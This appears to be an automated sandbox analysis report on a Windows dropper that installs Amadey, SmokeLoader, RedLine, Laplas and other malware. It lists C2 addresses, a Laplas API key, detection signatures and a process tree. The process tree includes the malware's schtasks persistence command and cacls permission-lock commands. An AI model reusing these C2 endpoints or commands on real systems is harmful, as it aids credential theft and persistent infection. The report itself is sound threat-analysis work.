amadey | 0be27abe7b8402580c8ee84dc58a64b2bc9077e2d32634675fb723de04646620

Analysis

max time kernel
102s
max time network
303s
platform
windows10-1703_x64
resource
win10-20230703-en
resource tags

arch:x64arch:x86image:win10-20230703-enlocale:en-usos:windows10-1703-x64system
submitted
15-07-2023 04:47

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

0be27abe7b8402580c8ee84dc58a64b2bc9077e2d32634675fb723de04646620.exe
Size

5.3MB
MD5

5247f286b68bc92d3035e205c669ba43
SHA1

a2300146f6545e570f5e0b290c59a60aed8d00b7
SHA256

0be27abe7b8402580c8ee84dc58a64b2bc9077e2d32634675fb723de04646620
SHA512

bf312c2603ca5445ccfc1820920101a92b92e109f65a2e87623feb567e805674ca632c0464870efab4974bc0464e8a0cc41e24acab6f555310cb282d2feba2a3
SSDEEP

98304:5RQP+mv3dnIJUp+EQkeScktlsJMDIpnFSFJeQ6J95tCn7fv:Hevt+5EZikLs6IBFK6J95o7fv

Malware Config

Extracted

Family

amadey

Version

3.83

5.42.65.80/8bmeVwqx/index.php

Extracted

Family

gcleaner

45.12.253.56

45.12.253.72

45.12.253.98

45.12.253.75

Extracted

Family

smokeloader

Botnet

up3

Extracted

Family

smokeloader

Version

2020

http://host-file-host6.com/

http://host-host-file8.com/

rc4.i32

Extracted

Family

redline

Botnet

120723_rc_11

rcam.tuktuk.ug:11290

Attributes

auth_value
3a7b4b38a7116be1f337083fb37de790

Extracted

Family

laplas

http://lpls.tuktuk.ug

Attributes

api_key
a0f588021b58e0c7908a163f8750678efedf2a66bf739a12427b379aef47ccde

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey

Detect Fabookie payload 3 IoCs

resource	yara_rule
behavioral2/memory/4848-129-0x0000000002890000-0x00000000029C1000-memory.dmp	family_fabookie
behavioral2/memory/4848-131-0x00007FF797EE0000-0x00007FF79803F000-memory.dmp	family_fabookie
behavioral2/memory/4848-181-0x0000000002890000-0x00000000029C1000-memory.dmp	family_fabookie

Fabookie
Fabookie is facebook account info stealer.
spyware stealer fabookie
GCleaner
GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.
loader gcleaner
Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba payload 2 IoCs

resource	yara_rule
behavioral2/memory/4332-424-0x0000000004080000-0x000000000496B000-memory.dmp	family_glupteba
behavioral2/memory/4332-436-0x0000000000400000-0x0000000001F25000-memory.dmp	family_glupteba

Laplas Clipper
Laplas is a crypto wallet stealer with three variants written in Golang, C#, and C++.
stealer clipper laplas

Modifies security service 2 TTPs 5 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

description	ioc	Process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1	reg.exe

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline
SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader

Suspicious use of NtCreateUserProcessOtherParentProcess 17 IoCs

description	pid	Process	procid_target
PID 2312 created 3288	2312	schtasks.exe	53
PID 1044 created 3288	1044	updChrome.exe	53
PID 680 created 3288	680	updChrome.exe	53
PID 2312 created 3288	2312	schtasks.exe	53
PID 2312 created 3288	2312	schtasks.exe	53
PID 2312 created 3288	2312	schtasks.exe	53
PID 2304 created 3288	2304	updChrome.exe	53
PID 2304 created 3288	2304	updChrome.exe	53
PID 680 created 3288	680	updChrome.exe	53
PID 1044 created 3288	1044	updChrome.exe	53
PID 680 created 3288	680	updChrome.exe	53
PID 680 created 3288	680	updChrome.exe	53
PID 2312 created 3288	2312	schtasks.exe	53
PID 2304 created 3288	2304	updChrome.exe	53
PID 2304 created 3288	2304	updChrome.exe	53
PID 1044 created 3288	1044	updChrome.exe	53
PID 1044 created 3288	1044	updChrome.exe	53

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 10 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	notepad.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	ntlhost.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	notepad.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	updChrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	notepad.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	updChrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	updChrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	updEdge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	updEdge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	updEdge.exe

Downloads MZ/PE file

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File created	C:\Windows\System32\drivers\etc\hosts	updChrome.exe
File created	C:\Windows\System32\drivers\etc\hosts	updChrome.exe
File created	C:\Windows\System32\drivers\etc\hosts	updChrome.exe

Modifies Windows Firewall 1 TTPs 1 IoCs

evasion

Modify Existing Service

T1031

pid	Process
2996	netsh.exe

Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

Checks BIOS information in registry 2 TTPs 20 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	updChrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	updChrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	notepad.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	updEdge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	updEdge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	updEdge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	notepad.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	updChrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	notepad.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	updEdge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	updEdge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	updChrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	notepad.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	notepad.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	ntlhost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	notepad.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	updChrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	updEdge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	updChrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	ntlhost.exe

Executes dropped EXE 20 IoCs

pid	Process
4848	aafg31.exe
4860	oldplayer.exe
2312	XandETC.exe
1948	oneetx.exe
3840	setup.exe
4128	updEdge.exe
4412	notepad.exe
1044	updChrome.exe
4872	toolspub2.exe
2140	updEdge.exe
1076	notepad.exe
4616	toolspub2.exe
680	updChrome.exe
4332	3eef203fb515bda85f514e168abb5973.exe
4956	updEdge.exe
4344	notepad.exe
2304	updChrome.exe
4092	oneetx.exe
3328	ntlhost.exe
4224	updater.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Themida packer 35 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral2/files/0x000600000001afcd-170.dat	themida
behavioral2/files/0x000600000001afcd-178.dat	themida
behavioral2/files/0x000600000001afcd-177.dat	themida
behavioral2/memory/4128-201-0x0000000000F60000-0x00000000014C8000-memory.dmp	themida
behavioral2/files/0x000c00000001afd7-215.dat	themida
behavioral2/files/0x000c00000001afd7-227.dat	themida
behavioral2/files/0x000c00000001afd7-228.dat	themida
behavioral2/memory/1044-231-0x00007FF6ACE70000-0x00007FF6ADE10000-memory.dmp	themida
behavioral2/memory/1044-230-0x00007FF6ACE70000-0x00007FF6ADE10000-memory.dmp	themida
behavioral2/memory/1044-244-0x00007FF6ACE70000-0x00007FF6ADE10000-memory.dmp	themida
behavioral2/memory/1044-249-0x00007FF6ACE70000-0x00007FF6ADE10000-memory.dmp	themida
behavioral2/memory/1044-250-0x00007FF6ACE70000-0x00007FF6ADE10000-memory.dmp	themida
behavioral2/files/0x000600000001afcd-251.dat	themida
behavioral2/memory/1044-252-0x00007FF6ACE70000-0x00007FF6ADE10000-memory.dmp	themida
behavioral2/memory/1044-256-0x00007FF6ACE70000-0x00007FF6ADE10000-memory.dmp	themida
behavioral2/files/0x000c00000001afd7-275.dat	themida
behavioral2/memory/680-279-0x00007FF6ACE70000-0x00007FF6ADE10000-memory.dmp	themida
behavioral2/memory/680-289-0x00007FF6ACE70000-0x00007FF6ADE10000-memory.dmp	themida
behavioral2/memory/680-307-0x00007FF6ACE70000-0x00007FF6ADE10000-memory.dmp	themida
behavioral2/memory/2140-287-0x0000000000F60000-0x00000000014C8000-memory.dmp	themida
behavioral2/memory/680-315-0x00007FF6ACE70000-0x00007FF6ADE10000-memory.dmp	themida
behavioral2/memory/1044-333-0x00007FF6ACE70000-0x00007FF6ADE10000-memory.dmp	themida
behavioral2/memory/680-327-0x00007FF6ACE70000-0x00007FF6ADE10000-memory.dmp	themida
behavioral2/files/0x000c00000001afd7-347.dat	themida
behavioral2/memory/4128-360-0x0000000000F60000-0x00000000014C8000-memory.dmp	themida
behavioral2/memory/4956-372-0x0000000000F60000-0x00000000014C8000-memory.dmp	themida
behavioral2/memory/680-321-0x00007FF6ACE70000-0x00007FF6ADE10000-memory.dmp	themida
behavioral2/memory/2304-387-0x00007FF6ACE70000-0x00007FF6ADE10000-memory.dmp	themida
behavioral2/files/0x000600000001afcd-323.dat	themida
behavioral2/memory/680-407-0x00007FF6ACE70000-0x00007FF6ADE10000-memory.dmp	themida
behavioral2/files/0x000b00000001afe9-1856.dat	themida
behavioral2/files/0x000b00000001afe9-2136.dat	themida
behavioral2/files/0x000b00000001afe9-2135.dat	themida
behavioral2/files/0x000600000001afeb-2366.dat	themida
behavioral2/files/0x000600000001afeb-2370.dat	themida

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000\Software\Microsoft\Windows\CurrentVersion\Run\NTSystem = "C:\\Users\\Admin\\AppData\\Roaming\\NTSystem\\ntlhost.exe"	notepad.exe

Checks whether UAC is enabled 1 TTPs 10 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	updChrome.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	updEdge.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	notepad.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	notepad.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	updEdge.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	notepad.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	updChrome.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	ntlhost.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	updEdge.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	updChrome.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Suspicious use of NtSetInformationThreadHideFromDebugger 10 IoCs

pid	Process
4128	updEdge.exe
4412	notepad.exe
1044	updChrome.exe
1076	notepad.exe
2140	updEdge.exe
680	updChrome.exe
4956	updEdge.exe
2304	updChrome.exe
4344	notepad.exe
3328	ntlhost.exe

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 4872 set thread context of 4616	4872	toolspub2.exe	97
PID 4128 set thread context of 4664	4128	updEdge.exe	107
PID 2140 set thread context of 4568	2140	updEdge.exe	114
PID 4956 set thread context of 2136	4956	updEdge.exe	231

Drops file in Program Files directory 1 IoCs

description	ioc	Process
File created	C:\Program Files\Notepad\Chrome\updater.exe	schtasks.exe

Launches sc.exe 31 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
2096	sc.exe
3296	sc.exe
1428	sc.exe
4392	sc.exe
3492	sc.exe
2296	sc.exe
208	sc.exe
2288	sc.exe
1372	sc.exe
2904	sc.exe
4404	sc.exe
1328	sc.exe
1924	sc.exe
340	sc.exe
2720	sc.exe
3100	sc.exe
2140	sc.exe
2812	sc.exe
5100	sc.exe
4104	sc.exe
4580	sc.exe
4352	sc.exe
2384	sc.exe
4072	sc.exe
1052	sc.exe
1268	sc.exe
1672	sc.exe
4216	sc.exe
704	sc.exe
3756	sc.exe
1352	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 9 IoCs

pid	pid_target	Process	procid_target
3780	3840	WerFault.exe	83
1212	3840	WerFault.exe	83
900	3840	WerFault.exe	83
1496	3840	WerFault.exe	83
4072	3840	WerFault.exe	83
3480	3840	WerFault.exe	83
3460	3840	WerFault.exe	83
2224	3840	WerFault.exe	83
4580	3840	WerFault.exe	83

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub2.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub2.exe

Creates scheduled task(s) 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
2192	schtasks.exe
4048	schtasks.exe
4724	schtasks.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
628	WMIC.exe

GoLang User-Agent 1 IoCs

Uses default user-agent string defined by GoLang HTTP packages.

description	flow	ioc
HTTP User-Agent header	21	Go-http-client/1.1

Kills process with taskkill 1 IoCs

evasion

pid	Process
2772	taskkill.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4128	updEdge.exe
4128	updEdge.exe
4616	toolspub2.exe
4616	toolspub2.exe
2140	updEdge.exe
2140	updEdge.exe
3288	Explorer.EXE
3288	Explorer.EXE
3288	Explorer.EXE
3288	Explorer.EXE
3288	Explorer.EXE
3288	Explorer.EXE
3288	Explorer.EXE
3288	Explorer.EXE
3288	Explorer.EXE
3288	Explorer.EXE
3288	Explorer.EXE
3288	Explorer.EXE
3288	Explorer.EXE
3288	Explorer.EXE
3288	Explorer.EXE
3288	Explorer.EXE
3288	Explorer.EXE
3288	Explorer.EXE
3288	Explorer.EXE
3288	Explorer.EXE
3288	Explorer.EXE
3288	Explorer.EXE
3288	Explorer.EXE
3288	Explorer.EXE
3288	Explorer.EXE
3288	Explorer.EXE
3288	Explorer.EXE
3288	Explorer.EXE
3288	Explorer.EXE
3288	Explorer.EXE
3288	Explorer.EXE
3288	Explorer.EXE
3288	Explorer.EXE
3288	Explorer.EXE
3288	Explorer.EXE
3288	Explorer.EXE
3288	Explorer.EXE
3288	Explorer.EXE
3288	Explorer.EXE
3288	Explorer.EXE
3288	Explorer.EXE
3288	Explorer.EXE
3288	Explorer.EXE
3288	Explorer.EXE
3288	Explorer.EXE
3288	Explorer.EXE
3288	Explorer.EXE
3288	Explorer.EXE
3288	Explorer.EXE
3288	Explorer.EXE
3288	Explorer.EXE
3288	Explorer.EXE
3288	Explorer.EXE
3288	Explorer.EXE
3288	Explorer.EXE
3288	Explorer.EXE
3288	Explorer.EXE
3288	Explorer.EXE

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
4616	toolspub2.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4128	updEdge.exe
Token: SeDebugPrivilege	2140	updEdge.exe
Token: SeDebugPrivilege	2772	taskkill.exe
Token: SeDebugPrivilege	1464	powershell.exe
Token: SeShutdownPrivilege	3288	Explorer.EXE
Token: SeCreatePagefilePrivilege	3288	Explorer.EXE
Token: SeShutdownPrivilege	3288	Explorer.EXE
Token: SeCreatePagefilePrivilege	3288	Explorer.EXE
Token: SeDebugPrivilege	4956	updEdge.exe
Token: SeShutdownPrivilege	3288	Explorer.EXE
Token: SeCreatePagefilePrivilege	3288	Explorer.EXE
Token: SeDebugPrivilege	2320	powershell.exe
Token: SeDebugPrivilege	348	powershell.exe
Token: SeDebugPrivilege	740	powershell.exe
Token: SeIncreaseQuotaPrivilege	1464	powershell.exe
Token: SeSecurityPrivilege	1464	powershell.exe
Token: SeTakeOwnershipPrivilege	1464	powershell.exe
Token: SeLoadDriverPrivilege	1464	powershell.exe
Token: SeSystemProfilePrivilege	1464	powershell.exe
Token: SeSystemtimePrivilege	1464	powershell.exe
Token: SeProfSingleProcessPrivilege	1464	powershell.exe
Token: SeIncBasePriorityPrivilege	1464	powershell.exe
Token: SeCreatePagefilePrivilege	1464	powershell.exe
Token: SeBackupPrivilege	1464	powershell.exe
Token: SeRestorePrivilege	1464	powershell.exe
Token: SeShutdownPrivilege	1464	powershell.exe
Token: SeDebugPrivilege	1464	powershell.exe
Token: SeSystemEnvironmentPrivilege	1464	powershell.exe
Token: SeRemoteShutdownPrivilege	1464	powershell.exe
Token: SeUndockPrivilege	1464	powershell.exe
Token: SeManageVolumePrivilege	1464	powershell.exe
Token: 33	1464	powershell.exe
Token: 34	1464	powershell.exe
Token: 35	1464	powershell.exe
Token: 36	1464	powershell.exe
Token: SeDebugPrivilege	3208	powershell.exe
Token: SeShutdownPrivilege	3476	powercfg.exe
Token: SeCreatePagefilePrivilege	3476	powercfg.exe
Token: SeShutdownPrivilege	4556	powercfg.exe
Token: SeCreatePagefilePrivilege	4556	powercfg.exe
Token: SeShutdownPrivilege	3212	powercfg.exe
Token: SeCreatePagefilePrivilege	3212	powercfg.exe
Token: SeShutdownPrivilege	3068	powercfg.exe
Token: SeCreatePagefilePrivilege	3068	powercfg.exe
Token: SeIncreaseQuotaPrivilege	2320	powershell.exe
Token: SeSecurityPrivilege	2320	powershell.exe
Token: SeTakeOwnershipPrivilege	2320	powershell.exe
Token: SeLoadDriverPrivilege	2320	powershell.exe
Token: SeSystemProfilePrivilege	2320	powershell.exe
Token: SeSystemtimePrivilege	2320	powershell.exe
Token: SeProfSingleProcessPrivilege	2320	powershell.exe
Token: SeIncBasePriorityPrivilege	2320	powershell.exe
Token: SeCreatePagefilePrivilege	2320	powershell.exe
Token: SeBackupPrivilege	2320	powershell.exe
Token: SeRestorePrivilege	2320	powershell.exe
Token: SeShutdownPrivilege	2320	powershell.exe
Token: SeDebugPrivilege	2320	powershell.exe
Token: SeSystemEnvironmentPrivilege	2320	powershell.exe
Token: SeRemoteShutdownPrivilege	2320	powershell.exe
Token: SeUndockPrivilege	2320	powershell.exe
Token: SeManageVolumePrivilege	2320	powershell.exe
Token: 33	2320	powershell.exe
Token: 34	2320	powershell.exe
Token: 35	2320	powershell.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
4860	oldplayer.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4236 wrote to memory of 4848	4236	0be27abe7b8402580c8ee84dc58a64b2bc9077e2d32634675fb723de04646620.exe	69
PID 4236 wrote to memory of 4848	4236	0be27abe7b8402580c8ee84dc58a64b2bc9077e2d32634675fb723de04646620.exe	69
PID 4236 wrote to memory of 4860	4236	0be27abe7b8402580c8ee84dc58a64b2bc9077e2d32634675fb723de04646620.exe	70
PID 4236 wrote to memory of 4860	4236	0be27abe7b8402580c8ee84dc58a64b2bc9077e2d32634675fb723de04646620.exe	70
PID 4236 wrote to memory of 4860	4236	0be27abe7b8402580c8ee84dc58a64b2bc9077e2d32634675fb723de04646620.exe	70
PID 4236 wrote to memory of 2312	4236	0be27abe7b8402580c8ee84dc58a64b2bc9077e2d32634675fb723de04646620.exe	71
PID 4236 wrote to memory of 2312	4236	0be27abe7b8402580c8ee84dc58a64b2bc9077e2d32634675fb723de04646620.exe	71
PID 4860 wrote to memory of 1948	4860	oldplayer.exe	72
PID 4860 wrote to memory of 1948	4860	oldplayer.exe	72
PID 4860 wrote to memory of 1948	4860	oldplayer.exe	72
PID 1948 wrote to memory of 2192	1948	oneetx.exe	73
PID 1948 wrote to memory of 2192	1948	oneetx.exe	73
PID 1948 wrote to memory of 2192	1948	oneetx.exe	73
PID 1948 wrote to memory of 3228	1948	oneetx.exe	75
PID 1948 wrote to memory of 3228	1948	oneetx.exe	75
PID 1948 wrote to memory of 3228	1948	oneetx.exe	75
PID 3228 wrote to memory of 3764	3228	cmd.exe	77
PID 3228 wrote to memory of 3764	3228	cmd.exe	77
PID 3228 wrote to memory of 3764	3228	cmd.exe	77
PID 3228 wrote to memory of 2632	3228	cmd.exe	78
PID 3228 wrote to memory of 2632	3228	cmd.exe	78
PID 3228 wrote to memory of 2632	3228	cmd.exe	78
PID 3228 wrote to memory of 824	3228	cmd.exe	79
PID 3228 wrote to memory of 824	3228	cmd.exe	79
PID 3228 wrote to memory of 824	3228	cmd.exe	79
PID 3228 wrote to memory of 3804	3228	cmd.exe	80
PID 3228 wrote to memory of 3804	3228	cmd.exe	80
PID 3228 wrote to memory of 3804	3228	cmd.exe	80
PID 3228 wrote to memory of 2596	3228	cmd.exe	81
PID 3228 wrote to memory of 2596	3228	cmd.exe	81
PID 3228 wrote to memory of 2596	3228	cmd.exe	81
PID 3228 wrote to memory of 3296	3228	cmd.exe	82
PID 3228 wrote to memory of 3296	3228	cmd.exe	82
PID 3228 wrote to memory of 3296	3228	cmd.exe	82
PID 1948 wrote to memory of 3840	1948	oneetx.exe	83
PID 1948 wrote to memory of 3840	1948	oneetx.exe	83
PID 1948 wrote to memory of 3840	1948	oneetx.exe	83
PID 1948 wrote to memory of 4128	1948	oneetx.exe	86
PID 1948 wrote to memory of 4128	1948	oneetx.exe	86
PID 1948 wrote to memory of 4128	1948	oneetx.exe	86
PID 1948 wrote to memory of 4412	1948	oneetx.exe	88
PID 1948 wrote to memory of 4412	1948	oneetx.exe	88
PID 1948 wrote to memory of 1044	1948	oneetx.exe	92
PID 1948 wrote to memory of 1044	1948	oneetx.exe	92
PID 1948 wrote to memory of 4872	1948	oneetx.exe	94
PID 1948 wrote to memory of 4872	1948	oneetx.exe	94
PID 1948 wrote to memory of 4872	1948	oneetx.exe	94
PID 1948 wrote to memory of 2140	1948	oneetx.exe	95
PID 1948 wrote to memory of 2140	1948	oneetx.exe	95
PID 1948 wrote to memory of 2140	1948	oneetx.exe	95
PID 1948 wrote to memory of 1076	1948	oneetx.exe	99
PID 1948 wrote to memory of 1076	1948	oneetx.exe	99
PID 4872 wrote to memory of 4616	4872	toolspub2.exe	97
PID 4872 wrote to memory of 4616	4872	toolspub2.exe	97
PID 4872 wrote to memory of 4616	4872	toolspub2.exe	97
PID 4872 wrote to memory of 4616	4872	toolspub2.exe	97
PID 4872 wrote to memory of 4616	4872	toolspub2.exe	97
PID 4872 wrote to memory of 4616	4872	toolspub2.exe	97
PID 1948 wrote to memory of 680	1948	oneetx.exe	101
PID 1948 wrote to memory of 680	1948	oneetx.exe	101
PID 1948 wrote to memory of 4332	1948	oneetx.exe	103
PID 1948 wrote to memory of 4332	1948	oneetx.exe	103
PID 1948 wrote to memory of 4332	1948	oneetx.exe	103
PID 1948 wrote to memory of 4956	1948	oneetx.exe	102

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3288
- C:\Users\Admin\AppData\Local\Temp\0be27abe7b8402580c8ee84dc58a64b2bc9077e2d32634675fb723de04646620.exe
  "C:\Users\Admin\AppData\Local\Temp\0be27abe7b8402580c8ee84dc58a64b2bc9077e2d32634675fb723de04646620.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4236
- - C:\Users\Admin\AppData\Local\Temp\aafg31.exe
    "C:\Users\Admin\AppData\Local\Temp\aafg31.exe"
    3⤵
    - Executes dropped EXE
    PID:4848
- - C:\Users\Admin\AppData\Local\Temp\oldplayer.exe
    "C:\Users\Admin\AppData\Local\Temp\oldplayer.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of WriteProcessMemory
    PID:4860
  - - C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
      "C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:1948
    - - C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe" /F
        5⤵
        Creates scheduled task(s)
        
        PID:2192
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "oneetx.exe" /P "Admin:N"&&CACLS "oneetx.exe" /P "Admin:R" /E&&echo Y|CACLS "..\207aa4515d" /P "Admin:N"&&CACLS "..\207aa4515d" /P "Admin:R" /E&&Exit
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3228
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        6⤵
        
        PID:3764
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "oneetx.exe" /P "Admin:N"
        6⤵
        
        PID:2632
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "oneetx.exe" /P "Admin:R" /E
        6⤵
        
        PID:824
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        6⤵
        
        PID:3804
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "..\207aa4515d" /P "Admin:N"
        6⤵
        
        PID:2596
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "..\207aa4515d" /P "Admin:R" /E
        6⤵
        
        PID:3296
    - - C:\Users\Admin\AppData\Local\Temp\1000310001\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000310001\setup.exe"
        5⤵
        Executes dropped EXE
        
        PID:3840
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3840 -s 668
        6⤵
        Program crash
        
        PID:3780
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3840 -s 924
        6⤵
        Program crash
        
        PID:1212
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3840 -s 980
        6⤵
        Program crash
        
        PID:900
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3840 -s 1020
        6⤵
        Program crash
        
        PID:1496
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3840 -s 984
        6⤵
        Program crash
        
        PID:4072
